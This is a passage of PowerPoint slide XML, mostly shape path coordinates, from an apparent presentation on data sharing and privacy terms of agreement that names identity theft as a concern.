                    <a:pt x="1391411" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="3209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="7183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="12701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="19738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="28267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="38263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="49701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="62553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="76794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="92399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="109341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="127594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="147133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="167931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="189963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="213203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="237625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="263203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="289911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="317723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="346614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="376557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="407527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="439497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="472442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="506335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="541152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="576866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="613450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="650880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="689130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="728172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="767983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="808535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="849802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="891760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="934381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="977640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1021512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1065969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1110987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1156540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1202601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1249144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1296144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1343576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1391412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1439247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1486679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1533679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1580222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1626283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1671836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1716854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1761311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="1805183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="1848442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="1891063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="1933021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="1974288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="2014840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="2054651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="2093693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="2131943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="2169373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="2205957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="2241671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="2276488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="2310381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="2343326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="2375296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="2406266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="2436209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="2465100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="2492912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="2519620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="2545198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="2569620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="2592860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="2614892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="2635690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="2655229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="2673482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="2690424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="2706029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="2720270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="2733122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="2744560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="2754556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="2763085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="2770122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="2775640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="2779614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="2782017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391411" y="2782824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="2782017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="2779614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="2775640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="2770122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="2763085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="2754556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="2744560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="2733122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="2720270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="2706029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="2690424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="2673482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="2655229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="2635690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="2614892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="2592860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="2569620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="2545198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="2519620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="2492912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="2465100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="2436209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="2406266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="2375296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="2343326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="2310381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="2276488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="2241671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="2205957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="2169373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="2131943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="2093693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="2054651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="2014840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="1974288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="1933021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="1891063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="1848442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="1805183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1761311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1716854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1671836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1626283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1580222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1533679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1486679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1439247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782824" y="1391412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1343576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1296144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1249144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1202601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1156540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1110987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1065969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1021512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="977640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="934381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="891760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="849802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="808535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="767983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="728172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="689130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="650880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="613450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="576866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="541152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="506335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="472442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="439497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="407527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="376557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="346614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="317723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="289911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="263203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="237625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="213203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="189963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="167931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="147133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="127594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="109341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="92399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="76794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="62553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="49701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="38263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="28267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="19738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="12701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="7183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="3209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391411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2904" y="4308347"/>
              <a:ext cx="1905000" cy="19050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169908" y="3916679"/>
              <a:ext cx="1189355" cy="448945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1189354" h="448945">
                  <a:moveTo>
                    <a:pt x="0" y="448818"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189227" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="EE636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169908" y="6332219"/>
              <a:ext cx="1189355" cy="635000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1189354" h="635000">
                  <a:moveTo>
                    <a:pt x="1189227" y="634745"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="634745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EE636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3862196" y="6782181"/>
            <a:ext cx="342201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997075" algn="l"/>
                <a:tab pos="3408679" algn="l"/>
              </a:tabLst>
            </a:pP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Identity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theft	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="dash" sz="2200" spc="-170">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="EE6360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dirty="0" u="dash" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="EE6360"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>	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39615" y="306451"/>
            <a:ext cx="817435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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agreement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9276" y="760476"/>
            <a:ext cx="11160251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16023" y="1933193"/>
            <a:ext cx="1181735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following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types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agreements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usually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made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prevent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any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security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complications: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498591" y="3351276"/>
            <a:ext cx="5241290" cy="4006850"/>
            <a:chOff x="5498591" y="3351276"/>
            <a:chExt cx="5241290" cy="4006850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6393179" y="3551428"/>
              <a:ext cx="3499485" cy="3492500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1328754" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1419485" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373899" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110228" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945043" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715810" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="3136900"/>
                  </a:lnTo>
